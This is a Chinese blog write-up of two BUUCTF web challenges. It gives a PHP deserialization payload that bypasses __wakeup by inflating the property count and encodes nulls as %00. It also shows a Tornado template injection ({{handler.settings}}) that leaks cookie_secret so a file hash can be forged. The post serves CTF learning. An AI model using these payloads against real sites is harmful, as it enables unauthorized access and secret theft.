BUUCTF Web [极客大挑战 2019]PHP & [护网杯 2018]easy_tornado 1

已于 2022-09-05 11:29:30 修改
阅读量438 收藏
点赞数
分类专栏: BUUCTF Web 文章标签: 安全
于 2022-09-05 11:27:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126699043
版权

[极客大挑战 2019]PHP 

启动靶机

找到网站所提的备份文件www.zip

/www.zip

 

 发现了三个php文件

 先看一下index.php文件

发现包含了class.php,还通过GET传了select参数

再看一下 class.php

可以发现,要想拿到flag,需要使username绝对等于'admin' 。

 destruct函数告诉我们需要时password的值等于100。

 编写脚本至2.php

<?php
class Name{
private $username = 'admin';
private $password = '100';
}
$name = new Name;
print(serialize($name));
?>


O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

但是在class.php有个wakeup函数会把username的值改为guest,看了看大佬的wp,把序列化结果中的2改成3即可绕过

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

构造payload:

/index.php?select=O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

竟然打不开,于是又去看了看大佬的wp,懂了。错误原因:我们从2.php复制过来的序列化结果是html显示的结果,有些字符无法通过html显示,所以右键查看一下www/2.php的源码 

 发现了我们有几个小方块没有加上,查一下对用url编码

 

用%00代替小方块重新构造payload

/index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

拿到flag                    flag{c6456382-dbab-4531-95df-feb10c2f0123}

[护网杯 2018]easy_tornado 1

启动靶机

发现了三个文档,打开看看 

/flag.txt

/welcome.txt

/hints.txt

 观察/hints.txt的url

 /file?filename=/hints.txt&filehash=c304cd212f98c6f2f94c2d2c1a2b16af

随便改下后面filehash的值访问一下

报错了,

1.尝试构造payload拿到cookie_secret

error?msg={{handler.settings}}

 

 'cookie_secret': 'a9d76d8c-f722-4d0b-861e-3ff005de04ea' 

2.计算md5(/fllllllllllllag)

3bf9f6cf685a6dd8defadabfb41a03a1

 3.计算最终的md5值

md5(a9d76d8c-f722-4d0b-861e-3ff005de04ea3bf9f6cf685a6dd8defadabfb41a03a1)

 0143937a3ecbd14e4078cd1369a4e1fd

4.构造最终payload

 /file?filename=/fllllllllllllag&filehash=0143937a3ecbd14e4078cd1369a4e1fd

 拿到flag               flag{6003d68d-c068-45b8-934d-25112d6ff24c}  

WmVicmE=
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 282
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
buuojweb刷题wp详解及知识整理—-【护网easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 718
BUUCTF-Web】 [极客挑战 2019]PHP
BUUCTF-web [极客挑战 2019]PHP1
zzqzzq11的博客
08-06 854
buuctf
BUUCTF--[极客挑战 2019]PHP
qq_46263951的博客
09-04 275
学了几天的PHP反序列化漏洞,找一个比较简单的题练练手 进入后给出提示网站存在备份,尝试几种常见的备份目录或者也可以直接扫描目录 访问/www.zip时弹出下载框,得到源代码,flag.php文件只有被调用执行才可获得到flag 在index.php中发现这样一段代码 <?php include 'class.php'; $select = $_GET['select']; //可控参数 $res=unserialize(@$select); //反序列化 ?> ...
Buuctf-[极客挑战 2019]Upload
m0_63563528的博客
04-20 229
还是不行,出现上面这个提示,说明它还检测了我的文件头是不是jpg。一般我们可以用几何画板随便做一张图片,然后在图片中插入一句话木马,这里我为什么不用呢?因为图片中容易存在<?这个字段而被过滤掉。诶这里发现它还有检测,检查到我的内容有<?,又被拦截了,上网查了一下。
2018护网逆向题目
10-16
2018护网的3道逆向题目.
2019护网行动必备防御手册(V1).pdf
08-16
最新2019护网行动蓝队必备防御手册(V1)
2019护网行动蓝队必备防御手册(
08-07
2019护网行动蓝队必备防御手册
等保&护网资料.zip
最新发布
05-24
等保&护网资料.zip
buuctf-web-[极客挑战 2019]PHP1
mlws1900的博客
09-22 529
因为成员(属性)是private,所以要在类名和成员名前加%00这个url编码是空的意思。在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),去执行__destruct。观察代码,发现需要username=admin,password=100才能获取flag。但是反序列化时会先运行__wakeup函数,对username赋值guest,需要绕过。打开环境,发现提示有备份文件,用dirsearch扫一遍,获得备份文件。index.php文件内容发现传参地址,对select进行传参。
BUUCTF [极客挑战 2019]PHP 1
weixin_45642610的博客
01-14 5195
BUUCTF [极客挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
[极客挑战 2019]PHP1
陈艺秋的博客
05-27 2383
既然提到了备份网站估计也是存在着网站备份文件,可以先用御剑扫一下啥都没扫出来,但是上回做文件备份的题目时收集了一些关于常用备份文件的文件名和后缀,可以直接使用burp抓包爆破,果然爆破出一个www.zip文件访问下载好文件就有三个php文件,下面进行代码审计。
BUUCTF-[极客挑战 2019]PHP1
Monica的博客
09-27 3656
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
BUUCTF——[极客挑战2019]PHP1
weixin_62248541的博客
11-25 205
BUUCTF——[极客挑战2019]PHP1
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 585
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[极客挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 2960
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
qq_51802152的博客
11-30 1952
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
[护网 2018]easy_tornado
03-16
护网 2018 中的 easy_tornado 题目是一道Web安全题目。根据题目描述,该网站使用了 Tornado 框架搭建,并且存在一个可以进行任意代码执行的漏洞。需要我们利用这个漏洞,在服务器上执行指定的命令。 解决这道题目...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值